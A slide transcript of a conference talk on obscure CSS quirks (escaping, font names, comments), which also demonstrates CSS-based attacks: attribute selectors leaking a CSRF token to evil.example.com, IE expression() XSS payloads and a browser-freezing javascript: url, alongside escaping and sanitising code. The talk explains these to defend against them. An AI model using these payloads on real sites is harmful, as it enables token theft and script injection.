
3.14 things I didn’t know about CSS @ CSS Day 2014

This talk showcases a series of obscure CSS fun facts, such as CSS syntax gimmicks and quirks, weird tricks that involve CSS in one way or another, and security vulnerabilities that are enabled by (ab)using CSS in unexpected ways.

Video: http://vimeo.com/channels/cssday/100264064
Links: http://lanyrd.com/2014/cssday/scypwp/

Mathias Bynens

June 04, 2014

Transcript

  1. @mathias · #cssday
    3.14 things I didn’t know about CSS

  4. @mathias

  5. !important

  6. !important
    .foo .bar {
    color: red;
    }
    .bar {
    color: green;
    }

  7. http://mths.be/bsh

  8. .foo .bar {
    color: red;
    }
    .bar {
    color: green !important;
    }
    !important

  12. .foo .bar {
    color: red;
    }
    .bar.bar.bar.bar.bar.bar.bar.bar {
    color: green;
    }
    New !important best practice*
    * not really

  15. Font family names

  16. Font family names in CSS
    html {
    font-family: 'Comic Sans MS';
    }
    “If there’s whitespace in the font family name, it must be quoted.”

  17. Font family names in CSS
    html {
    font-family: Comic Sans MS;
    }
    “If there’s whitespace in the font family name, it must be quoted.”
    http://mths.be/bft

  18. Font family names in CSS
    html {
    font-family: 456bereastreet;
    }

  20. Font family names in CSS
    html {
    font-family: \34 56bereastreet;
    }

  21. Font family names in CSS
    html {
    font-family: '456bereastreet';
    }

  22. http://mths.be/bjm

  23. Attribute values

  24. Attribute values

    a[href="foo"] {
    background: hotpink;
    }

  25. Unquoted attribute values

    a[href=foo] {
    background: hotpink;
    }

  26. Unquoted attribute values

    a[href=foo|bar] {
    background: hotpink;
    }

  28. Unquoted attribute values

    a[href="foo|bar"] {
    background: hotpink;
    }
    http://mths.be/bal

  29. Unquoted attribute values
    http://mths.be/bjn

  31. CSS comments

  32. CSS comments
    .some-selector {
    background: hotpink;
    /*color: red;*/
    text-align: center;
    }

  34. CSS comments
    .some-selector {
    background: hotpink;
    //color: red;
    text-align: center;
    }

  37. CSS comments
    .some-selector {
    background: hotpink;
    colour: red;
    text-align: center;
    }
    http://mths.be/brz

  42. HTML tags

  43. Valid HTML
    Foo
    …

  45. Valid HTML
    Huh?
    …

  47. Valid HTML
    lolwut
    …

  49. Using CSS without HTML

  50. “No JS”

    http://mths.be/bsf

  55. CSS without HTML
    $ curl -i http://mathiasbynens.be/demo/css-without-html
    HTTP/1.1 200 OK
    Date: Wed, 04 Jun 2014 13:33:37 GMT
    Link: ;rel=stylesheet
    Content-Length: 0
    Content-Type: text/html; charset=UTF-8
    http://mths.be/bpe

  58. http://mths.be/bsb

  59. Unicode in CSS

  60. Classes and IDs in HTML

    legalese
    HTML 4 lyfe, homes!
    LOL

    Warning: …
    Outdated browser detected.
    http://mths.be/afd

  61. Classes and IDs in HTML
    Good luck styling me!
    heh
    huh
    wat
    http://mths.be/afd

  62. http://mths.be/bsc

  63. Escaping CSS selectors
    #\#id { }
    .\.class { }

    #\#id\.class\:hover\{\} { }
    #\#id\.class\3A hover\{\} { }
    .\[attr\=\'value\'\] { }
    #\34 04-error { }

  64. Escaping CSS selectors

    #© { }
    #\A9 { }

    .♥ { }
    .\2665 { }

    #“” { }
    #\201C \201D { }

    .💩 { }
    .\1F4A9 { }

  65. Escaping CSS selectors
    http://mths.be/bsd

  66. http://mths.be/bpo

  67. http://mths.be/cssescape

  68. Escaping CSS selectors
    var $el = $('#' + location.hash);
    // …
    http://mths.be/cssescape

  69. Escaping CSS selectors
    var $el = $('#' + location.hash);
    // …
    var $a = $('a[href="' + someValue + '"]');
    // …
    http://mths.be/cssescape

  71. Escaping CSS selectors
    var $el = $('#' + CSS.escape(location.hash));
    // …
    var $a = $('a[href="' + CSS.escape(someValue) + '"]');
    // …
    http://mths.be/cssescape

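A worked version of the escaping the last few slides call for, added here as an example rather than the deck's own code: it implements the CSSOM `CSS.escape()` rules in plain JavaScript (hypothetical names `cssEscape`, `idSelectorFromHash`, `hrefSelector`), reproduces the escapes shown on the earlier slides (`\34 56bereastreet`, `\#id\.class\:hover\{\}`, `\34 04-error`), and strips the leading `#` of `location.hash` before escaping, since that character would otherwise be escaped as part of the identifier.

```javascript
// Added example, not the deck's code: CSS.escape() per the CSSOM
// "serialize an identifier" rules, for use where the native one is missing.
// `cssEscape`, `idSelectorFromHash` and `hrefSelector` are hypothetical names.
function cssEscape(value) {
  const string = String(value);
  const length = string.length;
  const firstCodeUnit = string.charCodeAt(0);
  let result = '';
  for (let index = 0; index < length; index++) {
    const codeUnit = string.charCodeAt(index);
    if (codeUnit === 0x0000) {            // NUL cannot be represented
      result += '\uFFFD';
      continue;
    }
    if (
      (codeUnit >= 0x0001 && codeUnit <= 0x001f) || codeUnit === 0x007f ||
      // a leading digit (or a digit after a leading '-') would start a number,
      // so it becomes a hex escape plus a space: '456...' -> '\34 56...'
      (index === 0 && codeUnit >= 0x0030 && codeUnit <= 0x0039) ||
      (index === 1 && codeUnit >= 0x0030 && codeUnit <= 0x0039 &&
        firstCodeUnit === 0x002d)
    ) {
      result += '\\' + codeUnit.toString(16) + ' ';
      continue;
    }
    if (index === 0 && length === 1 && codeUnit === 0x002d) {
      result += '\\-';                    // a lone '-' is not an identifier
      continue;
    }
    if (
      codeUnit >= 0x0080 || codeUnit === 0x002d || codeUnit === 0x005f ||
      (codeUnit >= 0x0030 && codeUnit <= 0x0039) ||
      (codeUnit >= 0x0041 && codeUnit <= 0x005a) ||
      (codeUnit >= 0x0061 && codeUnit <= 0x007a)
    ) {
      result += string.charAt(index);     // non-ASCII, '-', '_', alphanumerics
      continue;
    }
    result += '\\' + string.charAt(index); // '#', '.', ':', '[', quotes, braces
  }
  return result;
}
// The two selectors from the slides, built safely. location.hash starts with
// '#', which has to be stripped before escaping or it would be escaped too.
function idSelectorFromHash(hash) {
  return '#' + cssEscape(hash.replace(/^#/, ''));
}
function hrefSelector(someValue) {
  return 'a[href="' + cssEscape(someValue) + '"]';
}
```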

  72. Using CSS for $evil%

  73. XSS

  74. http://mths.be/bry

  75. Injection contexts
    p { color: <%= USER_COLOR %>; }

    Hello !
    View your account.

    window.userID = <%= USER_ID %>;

  76. What’s the worst you can do if you have control over a page’s CSS?

  90. Stealing data from the DOM
    name="csrf-token" id="csrf" value="abcdef…">
    http://mths.be/bsj

  91. Stealing data from the DOM
    #csrf[value^="a"] {
    background: url(//evil.example.com/?v=a);
    }
    #csrf[value^="b"] {
    background: url(//evil.example.com/?v=b);
    }
    #csrf[value^="c"] {
    background: url(//evil.example.com/?v=c);
    }
    /* … */
    http://mths.be/bsj

  95. CSS Expressions in IE ≤ 7
    #myDiv {
    background: hotpink;
    position: absolute;
    left: expression(document.body.clientWidth / 2 - myDiv.offsetWidth / 2);
    top: expression(document.body.clientHeight / 2 - myDiv.offsetHeight / 2);
    }
    Lorem ipsum
    http://mths.be/brw

  97. * {
    width: expression(
    alert('XSS through CSS')
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

  100. * {
    width: expression(
    if (!window.done)
    alert('XSS through CSS'),
    window.done=1
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

  101. * {
    wtflol: expression(
    if (!window.done)
    open('http://evil.example.com/'),
    window.done=1
    );
    }
    CSS Expressions in IE ≤ 7
    http://mths.be/brw

  104. content="IE=Edge">
    IE’s legacy document modes
    http://mths.be/brx

  105. content="IE=7">
    IE’s legacy document modes
    http://mths.be/brx

  106. CSS Expressions in IE ≤ 10
    #myDiv {
    background: hotpink;
    position: absolute;
    left: expression(document.body.clientWidth / 2 - myDiv.offsetWidth / 2);
    top: expression(document.body.clientHeight / 2 - myDiv.offsetHeight / 2);
    }
    Lorem ipsum
    http://mths.be/brx

  107. content="IE=7">
    CSS Expressions in IE ≤ 10
    http://mths.be/bpu

  108. How to avoid CSS expression vulnerabilities?
    1. sanitize user input before injecting it in a CSS context
    2. disallow framing using the HTTP header X-Frame-Options: DENY
    3. use
    http://mths.be/bpu

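The first mitigation on the slide, sanitising before injecting into a CSS context, worked through for the `p { color: <%= USER_COLOR %>; }` context from the injection-contexts slide, as an added example that is not the deck's code: `safeCssColor` and `renderColorRule` are hypothetical names, and the check is an allowlist of colour shapes rather than a blocklist of dangerous substrings, so a value can never carry the `;`, `}`, `(` or `/` it would need to leave the declaration.

```javascript
// Added example, not the deck's code: allowlist validation for a value that
// is about to be interpolated into a CSS declaration. Anything that is not
// shaped like a colour is replaced by a fixed fallback.
const COLOR_GRAMMAR = [
  /^[a-zA-Z]{3,20}$/,                                   // keyword: hotpink
  /^#([0-9a-fA-F]{3,4}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})$/, // hex: #f0f, #ff00ff80
  /^rgba?\(\s*\d{1,3}(\s*,\s*\d{1,3}){2}(\s*,\s*(0|1|0?\.\d+))?\s*\)$/,
  /^hsla?\(\s*\d{1,3}(\s*,\s*\d{1,3}%){2}(\s*,\s*(0|1|0?\.\d+))?\s*\)$/,
];
// Keywords are checked by shape only (letters), not against the full list of
// colour names: an unknown word is an invalid value the browser ignores, and
// letters alone cannot introduce the '(' that expression() or url() need.

function safeCssColor(input, fallback = 'inherit') {
  const value = String(input).trim();
  if (value.length > 40) return fallback;               // no colour is longer
  return COLOR_GRAMMAR.some((re) => re.test(value)) ? value : fallback;
}

// Template helper standing in for `p { color: <%= USER_COLOR %>; }`.
function renderColorRule(userColor) {
  return 'p { color: ' + safeCssColor(userColor) + '; }';
}
```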

  110. * {
    background: url('javascript:while(true){}');
    }
    Freezing Firefox
    http://mths.be/bsa

  111. http://mths.be/brs

  113. there’s more to CSS
    than & & the '

  115. One More Thing™

  117. p i {
    color: black;
    }
    What band is this?
    The Black ’d s

  119. Thanks to:
    Simon Pieters
    Tab Atkins
    Martin Kool
    Mario Heiderich
    Frederik Braun
    Mike West
    Divya Manian

  120. Questions?
    @mathias